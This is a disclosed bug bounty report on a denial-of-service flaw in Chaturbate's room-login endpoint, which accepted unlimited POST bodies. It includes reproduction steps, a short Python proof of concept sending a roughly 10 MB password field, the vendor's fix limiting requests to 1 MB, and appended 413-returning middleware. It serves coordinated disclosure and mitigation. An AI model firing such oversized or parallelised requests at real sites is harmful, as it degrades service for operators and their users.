Unrestricted POST request size on roomlogin endpoint
State Resolved (Closed)
Disclosed publicly 2018-10-07T14:55:42.685Z
Reported To
Weakness Denial of Service
Bounty $200


Timeline
submitted a report to Chaturbate .
2018-10-03T14:45:32.783Z

POST requests to the endpoint /roomlogin/<user> are not limited in size. While the main website login endpoint correctly limits the size of the request, this endpoint does not. This can be a means to perform a DoS attack.

Steps To Reproduce:

  1. <user> has a password-protected stream.
  2. Send a large POST request to /roomlogin/<user> (e.g., a really long password).

Expected behaviour

HTTP error 413 is promptly returned.

Actual behaviour

Server reads and processes the whole request, consuming a large amount of time.

POC

This Python snippet can reproduce the issue. A ~10 MB request consumes about 30 seconds of server time. I did not proceed further to avoid disrupting the service, and because this attack, which can be easily parallelized, already has a pretty serious impact on its own.

import requests

url = "https://it.chaturbate.com/roomlogin/█████/"   # room-login URL (redacted in the disclosure)
csrf = "███████"                                       # CSRF token (redacted)

# Build a form submission whose password field is ~10 MB.
password_size = 10 * 1000 * 1000
payload = {'password': 'a' * password_size, 'next': '/████/', 'csrfmiddlewaretoken': csrf}

s = requests.Session()
s.headers.update({'referer': url})
s.cookies.set("csrftoken", csrf)
s.cookies.set("sessionid", "█████████")  # session cookie (redacted)
r = s.post(url, data=payload)

print(r.elapsed)  # wall-clock time the single request took
0:00:40.249484

Suggested resolution steps

  • Put a reasonably low limit on request size, as already happens with the main login.
  • (Optional) Limit the max size of the input element #id_password to 64 characters.

Impact

DoS of the main website. The attack can be easily parallelized, leading to a potentially severe DDoS.

Regards,
Frans
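A server-side mitigation for the first suggested resolution step, added here as an example (it is not code from the report or from the site operator): a WSGI middleware that answers oversized POSTs to the room-login path with HTTP 413 before the view reads the body. The 1 MB limit, the /roomlogin/ path prefix and the stub view are assumptions for illustration.

```python
import io

MAX_BODY_BYTES = 1 * 1024 * 1024   # 1 MB, the limit the fix on this page settled on
PROTECTED_PREFIX = "/roomlogin/"   # assumed path prefix of the room-login endpoint

def body_size_limit(app, limit=MAX_BODY_BYTES, prefix=PROTECTED_PREFIX):
    """WSGI middleware: answer oversized POSTs to the protected path with 413
    before the wrapped application (form parser, password check) reads a byte."""
    def middleware(environ, start_response):
        if environ.get("REQUEST_METHOD") == "POST" and environ.get("PATH_INFO", "").startswith(prefix):
            try:
                length = int(environ.get("CONTENT_LENGTH") or "")
            except ValueError:
                length = -1  # header absent or malformed
            # A missing Content-Length (e.g. a chunked upload) is refused as well;
            # otherwise a client could stream an unbounded body past this check.
            if length < 0 or length > limit:
                body = b"Request entity too large\n"
                start_response("413 Payload Too Large", [
                    ("Content-Type", "text/plain"),
                    ("Content-Length", str(len(body))),
                    ("Connection", "close")])
                return [body]
        return app(environ, start_response)
    return middleware

def room_login_stub(environ, start_response):
    """Stand-in for the real view: it reads the entire body, which is exactly
    the work the middleware must prevent for oversized requests."""
    environ["wsgi.input"].read(int(environ.get("CONTENT_LENGTH") or 0))
    start_response("200 OK", [("Content-Type", "text/plain")])
    return [b"ok\n"]

def simulate(app, method, path, body, content_length=None):
    """Drive a WSGI app with a constructed request and return its status line.
    content_length overrides the header so a missing or lying value can be tested."""
    environ = {"REQUEST_METHOD": method, "PATH_INFO": path,
               "wsgi.input": io.BytesIO(body),
               "CONTENT_LENGTH": str(len(body)) if content_length is None else content_length}
    seen = {}
    def start_response(status, headers, exc_info=None):
        seen["status"] = status
    list(app(environ, start_response))  # consume the iterable as a server would
    return seen["status"]

if __name__ == "__main__":
    guarded = body_size_limit(room_login_stub)
    print(simulate(guarded, "POST", "/roomlogin/someuser/", b"password=" + b"a" * 64))
    print(simulate(guarded, "POST", "/roomlogin/someuser/", b"password=" + b"a" * (2 * 1024 * 1024)))
```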

lucach Activities::Comment
2018-10-03T16:25:29.869Z
(Human Augmented Signal) I confirm that the report is reproducible (POC attached), has a security impact and is in scope (targets main website).


williammmllc Activities::ReportSeverityUpdated
2018-10-05T00:58:49.546Z


williammmllc Activities::BugTriaged
2018-10-05T01:00:06.294Z
Thanks for the report. The login length is limited to prevent a DDoS on the hash function; however, this doesn't apply to the room login. We will, however, limit the submit size.


Activities::BountyAwarded
2018-10-05T01:00:17.058Z


lucach Activities::Comment
2018-10-05T11:39:05.530Z
I perfectly understand the difference between login and room passwords, but the significant processing time of such a request still looks pretty worrisome. Thanks for the bounty and the quick response.


williammmllc Activities::BugResolved
2018-10-05T21:48:57.700Z
Thanks for the report. This should now be limited to 1 MB; can you confirm?


lucach Activities::Comment
2018-10-06T15:02:25.921Z
I can confirm; now the longest request cannot take more than a bunch of seconds of server time, which is a reasonable limit. Well done, and congratulations on the quickness of the process!


williammmllc Activities::AgreedOnGoingPublic
2018-10-07T00:19:02.590Z
Thanks for the confirmation!


lucach Activities::AgreedOnGoingPublic
2018-10-07T14:55:42.629Z


lucach Activities::ReportBecamePublic
2018-10-07T14:55:42.720Z